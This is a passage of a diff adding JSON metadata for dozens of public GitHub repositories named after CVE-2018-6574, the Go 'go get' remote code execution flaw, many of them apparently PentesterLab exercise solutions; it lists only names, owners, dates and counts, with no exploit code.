"https:\/\/github.com\/vishack\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-12-29T12:27:06Z", + "updated_at": "2020-12-30T07:14:07Z", + "pushed_at": "2020-12-30T07:14:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 325780499, + "name": "cve-2018-6574-exercise", + "full_name": "PLP-Orange\/cve-2018-6574-exercise", + "owner": { + "login": "PLP-Orange", + "id": 76811827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76811827?v=4", + "html_url": "https:\/\/github.com\/PLP-Orange", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PLP-Orange\/cve-2018-6574-exercise", + "description": null, + "fork": false, + "created_at": "2020-12-31T10:57:21Z", + "updated_at": "2020-12-31T11:33:12Z", + "pushed_at": "2020-12-31T11:33:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 328521772, + "name": "CVE-2018-6574", + "full_name": "purgedemo\/CVE-2018-6574", + "owner": { + "login": "purgedemo", + "id": 77254765, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77254765?v=4", + "html_url": "https:\/\/github.com\/purgedemo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/purgedemo\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2021-01-11T01:55:54Z", + "updated_at": "2021-01-11T02:11:46Z", + "pushed_at": "2021-01-11T02:11:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 328525338, + "name": "CVE-2018-6574_2", + "full_name": "purgedemo\/CVE-2018-6574_2", + "owner": { + "login": "purgedemo", + "id": 77254765, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77254765?v=4", + "html_url": "https:\/\/github.com\/purgedemo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/purgedemo\/CVE-2018-6574_2", + "description": null, + "fork": false, + "created_at": "2021-01-11T02:16:19Z", + "updated_at": "2021-01-11T02:25:37Z", + "pushed_at": "2021-01-11T02:25:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 345243566, + "name": "POC-CVE-2018-6574", + "full_name": "killtr0\/POC-CVE-2018-6574", + "owner": { + "login": "killtr0", + "id": 22793707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22793707?v=4", + "html_url": "https:\/\/github.com\/killtr0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/killtr0\/POC-CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2021-03-07T02:45:41Z", + "updated_at": "2024-08-12T20:10:58Z", + "pushed_at": "2021-03-07T03:32:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 350858381, + "name": "pentesterlab-cve-2018-6574", + "full_name": "theJuan1112\/pentesterlab-cve-2018-6574", + "owner": { + "login": "theJuan1112", + "id": 57808488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57808488?v=4", + "html_url": "https:\/\/github.com\/theJuan1112", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theJuan1112\/pentesterlab-cve-2018-6574", + "description": "solution", + "fork": false, + "created_at": "2021-03-23T21:10:23Z", + "updated_at": "2021-03-23T21:18:46Z", + "pushed_at": "2021-03-23T21:18:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 358086744, + "name": "test-CVE-2018-6574-", + "full_name": "MohamedTarekq\/test-CVE-2018-6574-", + "owner": { + "login": "MohamedTarekq", + "id": 54548283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54548283?v=4", + "html_url": "https:\/\/github.com\/MohamedTarekq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MohamedTarekq\/test-CVE-2018-6574-", + "description": null, + "fork": false, + "created_at": "2021-04-15T01:10:43Z", + "updated_at": "2021-04-15T01:15:13Z", + "pushed_at": "2021-04-15T01:15:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 377097654, + "name": "CVE-2018-6574", + "full_name": "OLAOLAOLA789\/CVE-2018-6574", + "owner": { + "login": "OLAOLAOLA789", + "id": 85891221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85891221?v=4", + "html_url": "https:\/\/github.com\/OLAOLAOLA789", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OLAOLAOLA789\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2021-06-15T08:52:08Z", + "updated_at": "2021-06-15T09:11:13Z", + "pushed_at": "2021-06-15T09:11:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 377461855, + "name": "labCVE-2018-6574", + "full_name": "repos13579\/labCVE-2018-6574", + "owner": { + "login": "repos13579", + "id": 85996263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85996263?v=4", + "html_url": "https:\/\/github.com\/repos13579", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/repos13579\/labCVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2021-06-16T10:45:39Z", + "updated_at": "2021-06-16T11:14:45Z", + "pushed_at": "2021-06-16T11:14:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 378333575, + "name": "cve-2018-6574", + "full_name": "sec000\/cve-2018-6574", + "owner": { + "login": "sec000", + "id": 21155589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21155589?v=4", + "html_url": "https:\/\/github.com\/sec000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sec000\/cve-2018-6574", + "description": "Pentesterlabs", + "fork": false, + "created_at": "2021-06-19T05:42:43Z", + "updated_at": "2021-06-19T05:52:38Z", + "pushed_at": "2021-06-19T05:52:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 378631477, + "name": "CVE-2018-6574-go-get-RCE", + "full_name": "jaya522\/CVE-2018-6574-go-get-RCE", + "owner": { + "login": "jaya522", + "id": 83168161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83168161?v=4", + "html_url": "https:\/\/github.com\/jaya522", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jaya522\/CVE-2018-6574-go-get-RCE", + "description": "go rce", + "fork": false, + "created_at": "2021-06-20T11:44:38Z", + "updated_at": "2021-06-20T11:49:07Z", + "pushed_at": "2021-06-20T11:49:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 379986673, + "name": "CVE-2018-6574", + "full_name": "noobTest1122\/CVE-2018-6574", + "owner": { + "login": "noobTest1122", + "id": 74728173, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74728173?v=4", + "html_url": "https:\/\/github.com\/noobTest1122", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/noobTest1122\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2021-06-24T16:23:55Z", + "updated_at": "2021-06-24T17:22:55Z", + "pushed_at": "2021-06-24T17:20:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 391625076, + "name": "cve-2018-6574", + "full_name": "ErnestZiemkowski\/cve-2018-6574", + "owner": { + "login": "ErnestZiemkowski", + "id": 21990788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21990788?v=4", + "html_url": "https:\/\/github.com\/ErnestZiemkowski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ErnestZiemkowski\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2021-08-01T12:47:02Z", + "updated_at": "2021-08-01T12:47:02Z", + "pushed_at": "2021-08-01T12:47:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 396846455, + "name": "CVE-2018-6574-POC", + "full_name": "l3ouu4n9\/CVE-2018-6574-POC", + "owner": { + "login": "l3ouu4n9", + "id": 17426216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17426216?v=4", + "html_url": "https:\/\/github.com\/l3ouu4n9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l3ouu4n9\/CVE-2018-6574-POC", + "description": null, + "fork": false, + "created_at": "2021-08-16T15:06:58Z", + "updated_at": "2021-08-16T15:26:14Z", + "pushed_at": "2021-08-16T15:26:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 397184526, + "name": "cve-2018-6574", + "full_name": "R3dAlch3mist\/cve-2018-6574", + "owner": { + "login": "R3dAlch3mist", + "id": 88844509, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88844509?v=4", + "html_url": "https:\/\/github.com\/R3dAlch3mist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R3dAlch3mist\/cve-2018-6574", + "description": "PTLabs", + "fork": false, + "created_at": "2021-08-17T09:09:48Z", + "updated_at": "2021-08-17T09:44:42Z", + "pushed_at": "2021-08-17T09:44:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 417416873, + "name": "CVE-2018-6574", + "full_name": "Devang-Solanki\/CVE-2018-6574", + "owner": { + "login": "Devang-Solanki", + "id": 75718583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75718583?v=4", + "html_url": "https:\/\/github.com\/Devang-Solanki", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Devang-Solanki\/CVE-2018-6574", + "description": "Exploit for remote command execution in Golang go get command.", + "fork": false, + "created_at": "2021-10-15T08:02:02Z", + "updated_at": "2024-11-12T20:53:45Z", + "pushed_at": "2021-10-15T08:36:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 419312678, + "name": "CVE-2018-6574", + "full_name": "ItsFadinG\/CVE-2018-6574", + "owner": { + "login": "ItsFadinG", + "id": 57340627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57340627?v=4", + "html_url": "https:\/\/github.com\/ItsFadinG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ItsFadinG\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2021-10-20T12:04:56Z", + "updated_at": "2024-05-08T14:09:39Z", + "pushed_at": "2021-10-20T12:13:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 424158572, + "name": "CVE-2018-6574-POC", + "full_name": "imojne\/CVE-2018-6574-POC", + "owner": { + "login": "imojne", + "id": 26826553, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26826553?v=4", + "html_url": "https:\/\/github.com\/imojne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imojne\/CVE-2018-6574-POC", + "description": null, + "fork": false, + "created_at": "2021-11-03T09:15:52Z", + "updated_at": "2021-11-03T09:51:27Z", + "pushed_at": "2021-11-03T09:51:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 464909428, + "name": "cve-2018-6574", + "full_name": "twseptian\/cve-2018-6574", + "owner": { + "login": "twseptian", + "id": 9025301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4", + "html_url": "https:\/\/github.com\/twseptian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twseptian\/cve-2018-6574", + "description": "cve-2018-6574", + "fork": false, + "created_at": "2022-03-01T13:42:50Z", + "updated_at": "2022-03-13T08:05:37Z", + "pushed_at": "2022-03-01T13:56:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 473521612, + "name": "CVE-2018-6574", + "full_name": "the-valluvarsploit\/CVE-2018-6574", + "owner": { + "login": "the-valluvarsploit", + "id": 94351646, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94351646?v=4", + "html_url": "https:\/\/github.com\/the-valluvarsploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/the-valluvarsploit\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2022-03-24T08:40:42Z", + "updated_at": "2022-11-23T00:05:24Z", + "pushed_at": "2022-03-24T08:41:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 483722584, + "name": "CVE-2018-6574", + "full_name": "yavolo\/CVE-2018-6574", + "owner": { + "login": "yavolo", + "id": 48648772, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48648772?v=4", + "html_url": "https:\/\/github.com\/yavolo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yavolo\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2022-04-20T16:03:00Z", + "updated_at": "2022-04-20T16:11:45Z", + "pushed_at": "2022-04-20T16:11:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497029793, + "name": "CVE-2018-6574", + "full_name": "jftierno\/CVE-2018-6574", + "owner": { + "login": "jftierno", + "id": 49501961, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49501961?v=4", + "html_url": "https:\/\/github.com\/jftierno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jftierno\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2022-05-27T14:34:28Z", + "updated_at": "2024-03-18T18:55:10Z", + "pushed_at": "2024-03-18T18:48:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497030057, + "name": "exploit_CVE-2018-6574", + "full_name": "Cypheer\/exploit_CVE-2018-6574", + "owner": { + "login": "Cypheer", + "id": 106392388, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106392388?v=4", + "html_url": "https:\/\/github.com\/Cypheer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cypheer\/exploit_CVE-2018-6574", + "description": "Exploit for Pentester Labs", + "fork": false, + "created_at": "2022-05-27T14:35:11Z", + "updated_at": "2022-05-27T19:16:59Z", + "pushed_at": "2022-05-27T19:13:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497041610, + "name": "CVE-2018-6574-2", + "full_name": "jftierno\/CVE-2018-6574-2", + "owner": { + "login": "jftierno", + "id": 49501961, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49501961?v=4", + "html_url": "https:\/\/github.com\/jftierno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jftierno\/CVE-2018-6574-2", + "description": null, + "fork": false, + "created_at": "2022-05-27T15:10:11Z", + "updated_at": "2022-05-27T15:11:36Z", + "pushed_at": "2022-05-27T15:12:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499134320, + "name": "cve-2018-6574", + "full_name": "tjcim\/cve-2018-6574", + "owner": { + "login": "tjcim", + "id": 3412452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3412452?v=4", + "html_url": "https:\/\/github.com\/tjcim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tjcim\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2022-06-02T12:52:56Z", + "updated_at": "2022-06-02T12:56:15Z", + "pushed_at": "2022-06-02T12:56:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 523140464, + "name": "CVE-2018-6574", + "full_name": "markisback\/CVE-2018-6574", + "owner": { + "login": "markisback", + "id": 52271027, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52271027?v=4", + "html_url": "https:\/\/github.com\/markisback", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/markisback\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2022-08-09T23:45:13Z", + "updated_at": "2022-08-10T00:07:58Z", + "pushed_at": "2022-08-10T00:07:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 533884028, + "name": "CVE-2018-6574-go-get-RCE", + "full_name": "hasharmujahid\/CVE-2018-6574-go-get-RCE", + "owner": { + "login": "hasharmujahid", + "id": 68507127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68507127?v=4", + "html_url": "https:\/\/github.com\/hasharmujahid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hasharmujahid\/CVE-2018-6574-go-get-RCE", + "description": "The issue is due to the fact that when installing a package, Golang will build native extensions. This can be used to pass additional flags to the compiler to gain code execution. For example, CFLAGS can be used.", + "fork": false, + "created_at": "2022-09-07T18:09:38Z", + "updated_at": "2022-09-07T18:20:01Z", + "pushed_at": "2022-09-07T18:19:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563700469, + "name": "CVE-2018-6574", + "full_name": "jeyaseelans86\/CVE-2018-6574", + "owner": { + "login": "jeyaseelans86", + "id": 45196752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45196752?v=4", + "html_url": "https:\/\/github.com\/jeyaseelans86", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeyaseelans86\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2022-11-09T06:28:02Z", + "updated_at": "2022-11-09T06:30:00Z", + "pushed_at": "2022-11-09T06:29:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563702608, + "name": "new-CVE-2018-6574", + "full_name": "jeyaseelans86\/new-CVE-2018-6574", + "owner": { + "login": "jeyaseelans86", + "id": 45196752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45196752?v=4", + "html_url": "https:\/\/github.com\/jeyaseelans86", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeyaseelans86\/new-CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2022-11-09T06:35:25Z", + "updated_at": "2022-11-09T06:35:57Z", + "pushed_at": "2022-11-09T06:35:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563791951, + "name": "CVE-2018-6574", + "full_name": "chr1sM\/CVE-2018-6574", + "owner": { + "login": "chr1sM", + "id": 37111023, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37111023?v=4", + "html_url": "https:\/\/github.com\/chr1sM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chr1sM\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2022-11-09T10:49:44Z", + "updated_at": "2022-11-11T18:35:11Z", + "pushed_at": "2022-11-11T18:35:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 573871584, + "name": "CVE-2018-6574", + "full_name": "mux0x\/CVE-2018-6574", + "owner": { + "login": "mux0x", + "id": 87925079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87925079?v=4", + "html_url": "https:\/\/github.com\/mux0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mux0x\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2022-12-03T17:41:32Z", + "updated_at": "2022-12-03T17:54:13Z", + "pushed_at": "2022-12-03T17:54:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 593089784, + "name": "CVE-2018-6574", + "full_name": "seoqqq\/CVE-2018-6574", + "owner": { + "login": "seoqqq", + "id": 123540754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123540754?v=4", + "html_url": "https:\/\/github.com\/seoqqq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seoqqq\/CVE-2018-6574", + "description": "Remote command execution in Golang go get command allows an attacker to gain code execution on a system by installing a malicious library.", + "fork": false, + "created_at": "2023-01-25T07:57:24Z", + "updated_at": "2023-01-25T08:20:03Z", + "pushed_at": "2023-01-25T08:19:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 595664546, + "name": "CVE-2018-6574", + "full_name": "antunesmpedro\/CVE-2018-6574", + "owner": { + "login": "antunesmpedro", + "id": 50156060, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50156060?v=4", + "html_url": "https:\/\/github.com\/antunesmpedro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/antunesmpedro\/CVE-2018-6574", + "description": "CVE-2018-6574 go get", + "fork": false, + "created_at": "2023-01-31T15:01:45Z", + "updated_at": "2023-01-31T15:03:42Z", + "pushed_at": "2023-01-31T15:03:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604917165, + "name": "CVE-2018-6574", + "full_name": "jahwni\/CVE-2018-6574", + "owner": { + "login": "jahwni", + "id": 126042052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126042052?v=4", + "html_url": "https:\/\/github.com\/jahwni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jahwni\/CVE-2018-6574", + "description": "Used for a PentesterLab exercise", + "fork": false, + "created_at": "2023-02-22T03:39:28Z", + "updated_at": "2023-02-22T04:07:15Z", + "pushed_at": "2023-02-22T04:07:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 626855931, + "name": "CVE-2018-6574", + "full_name": "NsByte\/CVE-2018-6574", + "owner": { + "login": "NsByte", + "id": 8709462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8709462?v=4", + "html_url": "https:\/\/github.com\/NsByte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NsByte\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2023-04-12T09:45:08Z", + "updated_at": "2023-04-12T14:54:41Z", + "pushed_at": "2023-04-12T14:55:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 651560536, + "name": "CVE-2018-6574", + "full_name": "Zeeshan12340\/CVE-2018-6574", + "owner": { + "login": "Zeeshan12340", + "id": 110278382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110278382?v=4", + "html_url": "https:\/\/github.com\/Zeeshan12340", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeeshan12340\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2023-06-09T14:08:23Z", + "updated_at": "2023-06-09T14:12:07Z", + "pushed_at": "2023-06-09T14:36:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 698841275, + "name": "CVE-2018-6574-POC", + "full_name": "moTorky\/CVE-2018-6574-POC", + "owner": { + "login": "moTorky", + "id": 60983164, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60983164?v=4", + "html_url": "https:\/\/github.com\/moTorky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/moTorky\/CVE-2018-6574-POC", + "description": null, + "fork": false, + "created_at": "2023-10-01T06:07:07Z", + "updated_at": "2023-10-01T06:07:07Z", + "pushed_at": 